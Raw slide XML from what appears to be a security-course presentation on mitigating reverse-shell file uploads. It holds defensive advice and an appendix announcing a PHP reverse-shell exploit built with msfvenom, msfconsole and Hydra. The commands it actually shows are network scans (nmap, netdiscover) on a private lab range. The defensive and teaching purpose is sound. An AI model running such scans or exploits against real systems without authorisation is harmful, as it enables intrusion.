            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line(s).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Install Filebeat on host machine(s) for monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>iptables -A INPUT -s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
              <a:t>(trusted ip address)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> –p tcp –m multiport! --dports 80,443 -j ACCEPT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>rvy</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F2B00E7-4E3A-4DAF-B40E-2F5F499571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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>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240" name="Google Shape;1240;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1436798"/>
            <a:ext cx="4572000" cy="33018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kind of alarm can be set to detect future file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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Alert if invalid file types are uploaded to the web server.</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Alert if any port is open.</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Alert on any traffic that is not expected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>An appropriate threshold should be set for each singular instance of a file uploaded to the server from outside of the company’s internal network. If the file comes from the internal network and has a suspicious name, like “xxxxxx.php”, the alert should also trigger.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440325" y="1436798"/>
            <a:ext cx="4637414" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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All file uploads from outside of the company’s internal network should be blocked. </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Store uploaded files in a location not accessible from the web.</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Manage privileges of all users to control access to sensitive files.</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Have the file type validated when posted to the server and block all executable files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Have all the files run through an antivirus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Describe the solution. If possible, provide the required command line.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>By having the file validated, it can prevent extension spoofing that is used to hide the file type. In conjunction with the sensitive folders on the server blocking executables, this would help prevent further reverse shells from working. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>z</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA7D8E7-8209-44DE-BF1B-24698B815E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F843F-EF1A-4FE4-89E0-698CB35ED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3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction – Code and Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Instructions for PHP Reverse Shell Exploit using msfvenom msfconsole Hydra from Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3625680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>- Discover the IP address of the Linux server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>**Scan for open ports and versions**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; nmap –sV 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{857E348F-8B14-4D81-95C9-68F022DD3D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="715616" y="1960343"/>
            <a:ext cx="3644350" cy="2926121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A0E71D2-28F4-4044-A4CA-F52070D03686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6963" y="95005"/>
            <a:ext cx="695400" cy="533700"/>
            <a:chOff x="4308760" y="694486"/>
            <a:chExt cx="695400" cy="749476"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;1038;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3011897D-69FD-40BF-88E6-A7C16FCD1E04}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4308760" y="694486"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>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mn-lt"/>
                  <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;1039;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EEC810B-53FB-4037-9117-5700ADFA8B5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4486297" y="1255337"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:pr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4545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F843F-EF1A-4FE4-89E0-698CB35ED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3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="533700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction – Code and Resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Continued…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="9144000" cy="3726880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>### Host Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>**ARP Scan**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; netdiscover –r 192.168.1.255/16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
